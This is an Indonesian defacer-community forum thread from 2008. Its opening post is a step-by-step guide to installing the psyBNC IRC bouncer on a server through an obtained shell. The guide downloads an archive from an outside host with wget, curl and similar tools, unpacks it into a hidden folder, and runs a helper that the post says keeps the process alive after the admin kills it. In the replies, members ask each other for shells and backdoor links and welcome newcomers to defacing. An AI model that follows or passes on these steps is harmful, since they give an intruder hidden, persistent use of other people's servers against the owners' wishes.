Komunitas Defacer Indonesia


 

IndeksPortalFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 How to Make psybnc with shell

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: How to Make psybnc with shell   Thu May 08, 2008 11:58 pm

1. Siapkan shell terserah mau SSH, PHP or... whatever you name it... klo blom punya silahkan cari di uncle google Wink Saya anggap semua sudah mendapatkan shell sekarang kita lanjutkan pengerjaannya...
2. Download file psy.tar.gz ke server ketikkan perintah berikut :
wget toeth.dk/psy.tar.gz
apabila shell kamu tidak mendukung perintah wget kamu bisa mencoba perintah lainnya yang sejenis :
lwp-download toeth.dk/psy.tar.gz
lynx toeth.dk/psy.tar.gz
fetch toeth.dk/psy.tar.gz
curl toeth.dk/psy.tar.gz
get toeth.dk/psy.tar.gz
etc...
oke lanjut...
3. ekstrak file psy.tar.gz tersebut caranya :
tar -zxvf psy.tar.gz
4. lalu masuk ke folder .psy caranya :
cd .psy
5. Oke kita langsung buat aja psybncx dengan perintah berikkut ini :
./config ident port
isi ident dengan ident psy dan port dengan port yang ingin digunakan ex :
./config vhia 2121
6. setelah itu ketikkan perintah berikut :
./fuck
perintah ini membuat psybnc bisa terus hidup meskipun di kill ama admin
7. nah sekarang kita jalankan psybnc dengan perintah :
./run
8. nah tunggu sampai loadingnya selesai...
9. sekarang buka mIRC lalu isikan ident dengan ident yang tadi kamu buat di langkah ke 5 lalu konek ke server tempat kamu memasang psy dan juga port yang tadi kamu buat di langkah 5 ex :
/s server.com 2121
10. nah untuk memasukkan password kamu ketikkan perintah ini mIRC :
/QUOTE pass passkamu
untuk join ke server ketik
/addserver irc.dal.net:6667

Nah sekarang kamu keluarkan mirc tetapi nick kamu akan terus online selama 24 jam sehari dan bla..bla..

Oke that's all

thx to all my friends

YaDoY666
tELaNjAnG
EA Ngel
bryan_ae1
Jack
ZPY
cr4wl3r
Bloody
blu3_cyb3r
atan6
or1c
keparat_florez

All MC Crew
All MH Crew
#bl4ckb0t @ DAL.net
#hikari-community @ DAL.net
#mainhack @ DAL.net
#gorontalo-defacer @ DAL.net
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
cr4wl3r
I'am Not Hacker
I'am Not Hacker


Jumlah posting : 373
Join date : 18.04.08
Age : 30
Lokasi : In Your Mind

PostSubyek: Re: How to Make psybnc with shell   Fri May 09, 2008 7:43 am

mantap, tp boleh minta shell engga Razz
Kembali Ke Atas Go down
Lihat profil user http://gorontalodefacer.forumandco.com
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: weeewww   Fri May 09, 2008 10:46 am

kreen oms bl4ck

di coba ahk

mudah mudahan gak mallpraktek Very Happy
Kembali Ke Atas Go down
Lihat profil user
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: Re: How to Make psybnc with shell   Fri May 09, 2008 9:37 pm

cr4wl3r wrote:
mantap, tp boleh minta shell engga Razz

backdoor yang waktu itu loe kasih gw mana?? gw lupa linknya silent
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: How to Make psybnc with shell   Sat May 10, 2008 3:24 am

bL4Ck_3n91n3 wrote:
cr4wl3r wrote:
mantap, tp boleh minta shell engga Razz

backdoor yang waktu itu loe kasih gw mana?? gw lupa linknya silent


Very Happy gua juga minta donkkkk
Kembali Ke Atas Go down
Lihat profil user
Uzuma_dOnezA
Script Kiddies
Script Kiddies


Jumlah posting : 111
Join date : 10.05.08
Age : 25
Lokasi : vallembank

PostSubyek: Re: How to Make psybnc with shell   Sat May 10, 2008 4:58 am

all ,, gw newbie niy gak tau ap2 __ w cuma mo tanya apaan t shell ,,, gimana dpetinnya___

truz ajarin w y smua

w gak bisa ap2 niy Crying or Very sad
Kembali Ke Atas Go down
Lihat profil user http://friendsterelite.co.cc
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: weww ada anak FTI   Sat May 10, 2008 5:12 am

uzuma wrote:
all ,, gw newbie niy gak tau ap2 __ w cuma mo tanya apaan t shell ,,, gimana dpetinnya___

truz ajarin w y smua

w gak bisa ap2 niy Crying or Very sad

Very Happy weww anak FTI suka deface

sama sama kita belajar yaahh Very Happy

Very Happy seneng da kawan baru sesama new'bie
Kembali Ke Atas Go down
Lihat profil user
cYb3r_jOk3
Script Kiddies
Script Kiddies


Jumlah posting : 232
Join date : 12.05.08
Age : 28
Lokasi : mAlaNk jAWatiMUr

PostSubyek: Re: How to Make psybnc with shell   Wed May 14, 2008 7:53 am

uzuma wrote:
all ,, gw newbie niy gak tau ap2 __ w cuma mo tanya apaan t shell ,,, gimana dpetinnya___

truz ajarin w y smua

w gak bisa ap2 niy Crying or Very sad

iya kk q juga masih bingung pa itu shell dan kawan-kawan

mohon lebih terangin lagi yah kk
Kembali Ke Atas Go down
Lihat profil user http://baeimlicious.blogspot.com
ascii
Admin
Admin


Jumlah posting : 379
Join date : 18.04.08

PostSubyek: Re: How to Make psybnc with shell   Wed May 14, 2008 11:09 am

shell / webshell neh ? Shocked
Kembali Ke Atas Go down
Lihat profil user
EA Ngel
Lamer
Lamer


Jumlah posting : 53
Join date : 13.05.08

PostSubyek: Re: How to Make psybnc with shell   Thu May 15, 2008 6:55 am

ascii wrote:
shell / webshell neh ? Shocked


itu shell buat PsyBnc
Kembali Ke Atas Go down
Lihat profil user
Sponsored content




PostSubyek: Re: How to Make psybnc with shell   Today at 4:36 am

Kembali Ke Atas Go down
 
How to Make psybnc with shell
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Pertamina vs Shell vs Total
» Penutupan Pom Bensin Shell
» ini tentang bahan bakar dari luar Shell.
» WTS santai : Jaket Alpinestars MX-1, HELM ARAI Hayden Make a wish size XL, glove alpinestars SPX red white (SOLD SOLD SOLD!)
» Shell Super oktan cuma 90, benar ngak sih ???

Permissions in this forum:Anda tidak dapat menjawab topik
::Gorontalo Defacer Community:: :: General Topic :: Tips and Trik-
Navigasi: